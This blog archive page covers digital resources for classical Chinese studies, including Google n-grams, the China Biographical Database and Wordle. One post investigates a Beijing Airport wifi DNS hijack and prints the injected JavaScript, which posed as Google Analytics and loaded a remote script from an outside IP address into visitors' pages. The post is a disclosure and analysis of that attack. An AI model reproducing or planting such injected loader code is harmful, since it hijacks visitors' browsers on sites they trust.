Digital Sinology

Google n-grams and pre-modern Chinese

Posted on 14 April 2015 by digital

The Google n-gram viewer allows real-time searching of the frequencies of words and word sequences over time across a large corpus of texts digitized as part of the Google Books project. Without getting into the debate as to whether things like broad cultural trends can legitimately be deduced from these results, it seems clear that access to term and n-gram frequency statistics generated from a large enough corpus at least ought to be able to tell us interesting things about observed word use (though probably with important caveats about things like selection of material).

So the fact that Google’s n-gram results include data for Chinese (albeit only in simplified characters) going back as far as 1500 AD sounds very promising. The online n-gram viewer allows querying of this data, so we can immediately get some results. For example, if we keep the default search scope of 1800-2000 (the authors themselves acknowledge that data gets quite sparse before 1800 so data from earlier than that may be less meaningful), and search for a single character like “万”, we get a nice graph of its frequency over time:

This looks like a good start, although we get noticeably less smooth results from the pre-1960 part of the graph. Trying some other characters, we can get some nice results like this one that seem plausibly attributable to the shift from literary to vernacular Chinese:

Unfortunately though, further queries quickly show the limitations of the data. According to the Google n-gram data, “Mengzi”, the name both of one of the most revered Chinese philosophers of the classical period as well as the hugely important canonical text attributed to him, is first mentioned in 1927:

Confucius himself doesn’t fare much better, especially when we go back earlier than 1800 – and the Analects doesn’t even get mentioned once until the 1950s:

Ouch. So it looks like there may be some pretty serious issues with the data even after 1800, and perhaps even as late as 1950. Of course, for a variety of reasons we would expect there to be more data available for the last 50 years or so. How much data is there? Luckily this information is available online.

Looking at the numbers it quickly becomes clear that the pre-modern data is fairly sparse: the first entry is for the year 1510, and has only one volume with 2206 “matches” (i.e. total 1-grams) in the “total counts” file for one single volume of 231 pages. This compares with the first English entry for 1505, with 32059 matches for one volume of 231 pages. Apart from the total quantity of data, one worry is that the number of recorded 1-grams does not seem to fit well with the number of pages – apparently there are fewer than ten recorded 1-grams per page for this volume, which seems improbably few. Adding up the total 1-grams for each year, we get a total of 65195 1-grams by 1560, and by 1900 the figure increases to over 11 million – still less than 0.05% of the total for the whole set (over 26 billion), but definitely enough for us to reasonably expect non-zero results for common terms.

So it does seem surprising that so many results should end up being zero even in cases where Google Books does have some data. For instance, although a search for “寡人” again has no data for any pre-1950 texts, the n-gram viewer itself provides a handy link to “Search in Google Books: 1800 – 1957”, which does return a number of results. This is interesting, because the search results in Google Books also give snippets of Google’s corresponding OCR results. For instance, Google Books has “寡人” occurring on various pages of a book it describes as “馬氏繹史: 160卷年表, 第 13-24 卷”, published according to Google Books in 1897:

Given the apparent errors (although the book is surely in the public domain, no image view or download is available) this book may have been excluded because of poor OCR quality or other reasons, and/or assigned a different date (the text itself being composed earlier than the publication of this edition). (An interesting aside: the results you get for the same search within the same volume of Google Books varies with location. In this case, “寡人” within this volume gets 67 results from Hong Kong, but only 35 from the US.) The first hit looks like it might correspond to parts of this page and the following one on the Chinese Text Project (based on a different edition of the text however).

A final issue that may affect the results is that of tokenization. Since Chinese doesn’t delimit words, the texts first have to be split into words based upon their content. So not every sequence of the characters “寡” and “人” will be counted as an instance of the term “寡人”. This is likely to introduce further problems, partly because it’s a somewhat difficult problem to begin with, but also because it will become a near-impossible task when additional corruption of the source text is introduced through OCR.

In summary, it seems that the Google n-gram data may still need some work before it will be useful for pre-modern Chinese.

Followup post: When n-grams go bad

Leave a comment

China Biographical Database

Posted on 12 April 2015 by digital

The China Biographical Database Project (CBDB) describes itself as “an online relational database with biographical information about approximately 328,000 individuals as of May 2014, primarily from the 7th through 19th centuries”. A joint project of Harvard’s Fairbank Center for Chinese Studies, Academia Sinica’s Institute of History and Philology, and Peking University’s Center for Research on Ancient Chinese History, the project’s relatively compact website belies an extraordinary wealth of structured data that is available for download in the form of an Access database, and can also be directly queried using an API.

The level of detail included in the database is quite astounding – and, crucially for this kind of material, the data is carefully structured such that many kinds of complex queries for specific types of information are possible.

The underlying tables that store the information can also be accessed directly to construct complex queries, or to export subsets of the data:

A simple public API is also offered that allows direct querying of the data and returns either human-readable HTML or structured data in XML or JSON. At present the only supported queries for this API appear to be names in Chinese or Pinyin and record number, which significantly limits its flexibility versus the Access database, but for applications where these queries are sufficient it provides a very neat way of accessing the data in a structured format. According to the site, at least four other projects are currently making use of the API.

Surprisingly even though the entire database is made freely available for download I found no explicit license or statement as to acceptable reuse of the data, other than the generic copyright notice at the bottom of the website, so it is unclear whether it is intended to be open source, though it is clearly open access.

Leave a comment

Beijing Airport Wifi hacked: DNS attack pushes adverts to sites via Google Analytics

Posted on 4 April 2015 by digital

While at Beijing Airport recently, I connected to the official airport wifi service, and noticed something strange when visiting ctext.org:

A large floating advert had appeared at the bottom right of every page of the site, obscuring much of the content.

Could the site have been hacked? I searched the HTML source for unusual Javascript or Iframe additions, but there weren’t any – all the code included should have been legitimate. Only one inclusion was not from ctext.org: the standard Google Analytics code, which loads asynchronously from http://www.google-analytics.com/ga.js. Let’s take a look at that file when retrieved over Beijing Airport wifi:

location_sign="jc";
var sign = new Error('log').stack;
var regx = /.*\/(.*?\.js.*?)/;
if(sign)
{
	var group = sign.match(regx);
	if(group)
	{
		var s = group[1];
	}
}
var url = "http://121.40.180.161/ad.js?" + s;
var jsNode = document.createElement('script');
jsNode.setAttribute('src',url);
if(document.body)
{
	if(document.body.appendChild)
	{
		document.body.appendChild(jsNode);
	}
}
else
{
	var head = document.getElementsByTagName('head').item(0);
	if(head.appendChild)
	{
		head.appendChild(jsNode);
	}
}

This code basically says something like “fetch an advert from 121.40.180.161 and attach it to this webpage” – definitely not what Google Analytics ought to be doing. So why is this happening?

home:~ user$ ping www.google-analytics.com
PING www-google-analytics.l.google.com (203.208.40.133): 56 data bytes
64 bytes from 203.208.40.133: icmp_seq=0 ttl=58 time=36.207 ms
64 bytes from 203.208.40.133: icmp_seq=1 ttl=58 time=38.659 ms

OK, so www.google-analytics.com is resolving to 203.208.40.133… who does that belong to?

home:~ user$ whois 203.208.40.133

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#


#
# Query terms are ambiguous.  The query is assumed to be:
#     "n 203.208.40.133"
#
# Use "?" to get help.
#

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=203.208.40.133?showDetails=true&showARIN=false&ext=netref2
#

NetRange:       203.0.0.0 - 203.255.255.255
CIDR:           203.0.0.0/8
NetName:        APNIC-203
NetHandle:      NET-203-0-0-0-1
Parent:          ()
NetType:        Allocated to APNIC
OriginAS:
Organization:   Asia Pacific Network Information Centre (APNIC)
RegDate:        1994-04-05
Updated:        2010-08-02
Comment:        This IP address range is not registered in the ARIN database.
Comment:        For details, refer to the APNIC Whois Database via
Comment:        WHOIS.APNIC.NET or http://wq.apnic.net/apnic-bin/whois.pl
Comment:        ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment:        for the Asia Pacific region. APNIC does not operate networks
Comment:        using this IP address range and is not able to investigate
Comment:        spam or abuse reports relating to these addresses. For more
Comment:        help, refer to http://www.apnic.net/apnic-info/whois_search2/abuse-and-spamming
Ref:            http://whois.arin.net/rest/net/NET-203-0-0-0-1

OrgName:        Asia Pacific Network Information Centre
OrgId:          APNIC
Address:        PO Box 3646
City:           South Brisbane
StateProv:      QLD
PostalCode:     4101
Country:        AU
RegDate:
Updated:        2012-01-24
Ref:            http://whois.arin.net/rest/org/APNIC

ReferralServer: whois://whois.apnic.net

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net
OrgTechRef:    http://whois.arin.net/rest/poc/AWC12-ARIN

OrgAbuseHandle: AWC12-ARIN
OrgAbuseName:   APNIC Whois Contact
OrgAbusePhone:  +61 7 3858 3188
OrgAbuseEmail:  search-apnic-not-arin@apnic.net
OrgAbuseRef:    http://whois.arin.net/rest/poc/AWC12-ARIN


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#

% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '203.208.32.0 - 203.208.63.255'

inetnum:        203.208.32.0 - 203.208.63.255
netname:        GOOGLECN
descr:          Beijing Gu Xiang Information Technology Co.,Ltd.
descr:          Bldg 6, No.1 Zhongguancun East Rd, Beijing
country:        CN
admin-c:        ZM657-AP
tech-c:         ZM657-AP
status:         ALLOCATED PORTABLE
mnt-by:         MAINT-CNNIC-AP
mnt-lower:      MAINT-CNNIC-AP
mnt-routes:     MAINT-CNNIC-AP
mnt-irt:        IRT-CNNIC-CN
changed:        ipas@cnnic.cn 20110412
source:         APNIC

irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
auth:           # Filtered
remarks:        Please note that CNNIC is not an ISP and is not
remarks:        empowered to investigate complaints of network abuse.
remarks:        Please contact the tech-c or admin-c of the network.
mnt-by:         MAINT-CNNIC-AP
changed:        ipas@cnnic.cn 20110428
source:         APNIC

person:         GOOGLECN Contact
address:        Kejian Building
address:        Tsinghua Science Park Building 6
address:        No. 1 Zhongguancun East Road
address:        Haidian District
address:        Beijing P.R. China 100084
country:        CN
phone:          +86-10-62503000
fax-no:         +86-10-62503001
e-mail:         cnnic-contact@google.com
nic-hdl:        ZM657-AP
mnt-by:         MAINT-CNNIC-AP
changed:        ipas@cnnic.net 20110426
source:         APNIC

% Information related to '203.208.40.0/23AS24424'

route:          203.208.40.0/23
descr:          FM SITE5
origin:         AS24424
notify:         nst@corp.ganji.com
mnt-by:         MAINT-CNNIC-AP
changed:        nst@corp.ganji.com 20060612
source:         APNIC

% This query was served by the APNIC Whois Service version 1.69.1-APNICv1r3 (WHOIS4)

Huh. That’s strange – the IP serving the fake Analytics code is actually allocated to GOOGLECN, registered to Google’s office in Beijing. What’s up with that? There’s definitely something funny going on here, presumably relating to the last part of the query response about 203.208.40.0/23 ultimately belonging to “FM SITE5” and perhaps being associated with ganji.com.

Anyway, it looks like what is happening is that someone is altering the DNS response for www.google-analytics.com to point to a server they control so they can display adverts on other people’s websites – in fact on any website that uses Google Analytics. For example:

It has to be said that this is a pretty good scam. After all, unless users are already familiar with the site they are visiting, they may simply assume that the adverts are legitimate ones run by the owners of these sites, while the profits go to the scammer and the site owner remains unaware that anything has happened. So who’s the scammer? Assuming this scam does not originate with someone at Google China or Beijing Airport, it seems most likely that someone’s router has been hacked, as has recently been reported elsewhere:

The scary thing about this is that the malicious code can easily be set to do all sorts of things – displaying adverts is relatively benign compared to popups appearing to come from legitimate and trusted sites that trick users into downloading malware-ridden software or direct attacks on known browser weaknesses, for instance. By compromising routers that service large numbers of users – airport wifi being an excellent example – scams taking advantage of Google Analytics code can quickly affect large numbers of people. Since from a user perspective the genuine Analytics code has no visible effect, its replacement with malicious code can be easily overlooked.

Comments Off

HK Visa Online Application Status Enquiry – Invalid Reference Number

Posted on 3 February 2015 by digital

This post is a little off-topic, but perhaps will help people Googling with the same problem.

A trivial issue nearly prevented me from being able to determine the status of my Hong Kong visa application online. The reference number I’d been given was of the form XXXX-nnnn-nn – four letters, four digits, then another two digits:

When I tried submitting the code exactly as (hand-)written on my receipt, the system told me the number was invalid:

For some reason the programmer in me thought, “surely it couldn’t be that the fields have to be zero padded?” – so I tried adding zeros to the middle field until the form would allow no more. Now displaying “XXXX-000nnnn-nn”, I submitted the form, and was amazed to see that it worked! Presumably the software makes a string comparison even for the numeric fields, so the reference number must have exactly 7 digits in the middle field:

In my case it turned out that being able to check online was very useful, as nobody was answering the phone at the relevant immigration department, and once I was finally able to check online, I discovered that my application was already approved and ready to collect.

I couldn’t find any mention of this in the instructions, and it certainly wasn’t obvious from the error message (I’d assumed that my application must by of the “not supported” type) – perhaps this report will help someone else check their status (or help someone at the immigration department fix their software/error message).

Leave a comment

Ming Qing Women’s Writings

Posted on 10 January 2015 by digital

The Ming Qing Women’s Writings (明清婦女著作) site provides a carefully curated database of women’s writing from the Ming, Qing, and Republican periods of Chinese history. The database contains a wealth of information about authors and individual texts (and poems) within individual works. The online version also includes facsimiles of all the corresponding texts that can be navigated using this extensive set of data.

While all of this data can be conveniently searched online in Chinese or Pinyin, it is also possible to download the entire data set in MS Access format.

Encouragingly the site seems to have been actively maintained (“last update: December 2014”), and is currently part of a research project going on until at least 2016.

Comments Off

CHinese ANcient Texts (CHANT) update

Posted on 6 January 2015 by digital

The Chinese University of Hong Kong’s subscription-based CHinese ANcient Texts (CHANT) website has recently undergone some renovation. The new interface appears to largely follow the layout and functionality of the previous version, although there seem to be a few puzzling changes, such as the omission of source text explanations and lists of emendations, both of which were previously available at least for most texts in the Pre-Qin and Han section. A new feature is the option to display a text with or without the corrections applied to it, by clicking the new “校改” and “原文” buttons.

The site now makes extensive use of Javascript to fetch pages, which can be frustrating as there is no page load indication. A huge benefit of the new site however is that the annotations finally display correctly on browsers other than Internet Explorer.

Coinciding with the change, it has become possible (at least at the institution that I’m based at) to access more areas of the database, though it’s unclear whether this is due to an accidental change, a policy decision, or the library paying a higher subscription rate.

Comments Off

Reviews of Digital Resources for Sinologists

Posted on 28 December 2014 by digital

Titled “Digital Resources for Sinologists 1.0“, this post by Holger Schneider and Jeffrey Tharsen gives a useful overview of digital dictionaries and other online tools for Chinese, many of which will be of interest to Sinologists, as well as offering some background on general aspects of digital dictionaries of Chinese.

Separated into two parts, titled “An Introduction to Chinese Electronic Dictionaries and Criteria for Their Evaluation” and “An Annotated List of Common Digital Dictionaries / Lexical Tools / Learning and Translation Tools / Encyclopædia”, it provides a valuable guide to many of the most important tools and databases in the field, as well as introducing a few less well-known resources that may also be of interest.

Comments Off

Classical Chinese Wordles

Posted on 20 September 2012 by digital

The ever-popular Wordle, like many tools designed to work with digital corpora, can be used on Chinese text with minor tweaking. Wordle takes a text and ranks the words in it in order of frequency, then produces a tag cloud that gives a visual summary with more frequently occurring words in larger letters. Though many tools do this, Wordle’s output is often particularly attractive.

To use Wordle with Chinese, firstly the text has to be split into words using spaces or other punctuation; if not, Wordle will treat each phrase as if it were a word. So instead of “孟子見梁惠王。”, we really want “孟子見梁惠王。”. Adding a space between each character is a reasonable approximation for classical Chinese, but obviously means that proper names like “孟子” don’t get treated correctly. Once the text is ready, it can be pasted straight into the Wordle tool (this requires that Java is installed and enabled in your browser). With Chinese text, there are a couple of extra steps. Firstly, on my system at least the default font used doesn’t work for Chinese, so initially instead of Chinese words I get empty boxes. To fix this, go to the Wordle font menu and choose a different font (e.g. “Chrysanthi Unicode”, which seems to work). Secondly, Chinese seems to be detected by Wordle as Arabic, and this results in random words being omitted; click on the “Language” menu in Wordle, and change the setting to “Do not remove common words”.

The tag clouds here are of the full texts of the Mozi, Mengzi, Hanfeizi, Xunzi, and Daodejing from the Chinese Text Project – can you work out which is which?

Wordle has the option to automatically remove some of the most common words in a language from the list – so that uninteresting words such as “a”, “the”, “of” and so on don’t appear as giant words overwhelming the tag cloud. Since Wordle doesn’t have a list for classical Chinese, I excluded a fairly arbitrary set of words from the input to produce these images: 也之以則而其曰者於與于不. Other particles such as 矣 should probably also be added to this list.

This highlights an important difficulty with word clouds in classical Chinese, however. Words like “無”, “為”, and “有” are very common in classical Chinese texts, but they are also philosophically interesting – in certain contexts and usages. Similarly “故” is a very common and not terribly interesting sentence connective meaning something like “thus” or “therefore”, but is also used to mean “cause”; “是” often simply means “this”, but can also mean “right”, “approve”, or “correct”.

As a result, a highly prominent appearance of 無 and 為 as in some of these Wordles isn’t necessarily an indication that the source was a Daoist text like the Daodejing – in fact if you look closely, you’ll see that in all of these texts 無 and 為 appear fairly often.

Even with these caveats however, this is a much more interesting and aesthetically pleasing way to look at the data than browsing a table of word frequencies.

Comments Off

Classical Chinese internet resources

Posted on 9 June 2012 by digital

A huge though largely unsorted list of Chinese language web sites and resources related to the study of early China has been assembled here:
http://ctext.org/discuss.pl?if=en&thread=3223065

Comments Off

Yīntōng: Chinese Phonological Database

Posted on 31 March 2012 by digital

Yintong is an online database of characters in the Guǎngyùn 廣韻, a dictionary dating from 1008 C.E., created by David Prager Branner.

The database has the following main functions:

Lookup by character, returning information about the fǎnqiè associated with the character, the phonological values represented by those fǎnqiè, and the page number of the Guǎngyùn where that reading appears.
Lookup by medieval Chinese reading, returning a list of the other characters in the same xiǎoyùn.
Lookup by two medieval Chinese readings, returning a list of any characters appearing in both xiǎoyùn.
Lookup by multiple characters, returning a transcription of each character based on the Guǎngyùn’s readings.

Further details: http://yintong.americanorientalsociety.org/html/about.htm.

Leave a comment

Digital Sinology

Google n-grams and pre-modern Chinese

China Biographical Database

Beijing Airport Wifi hacked: DNS attack pushes adverts to sites via Google Analytics

HK Visa Online Application Status Enquiry – Invalid Reference Number

Ming Qing Women’s Writings

CHinese ANcient Texts (CHANT) update

Reviews of Digital Resources for Sinologists

Classical Chinese Wordles

Classical Chinese internet resources

Yīntōng: Chinese Phonological Database

Recent Posts

Recent Comments

Archives

Categories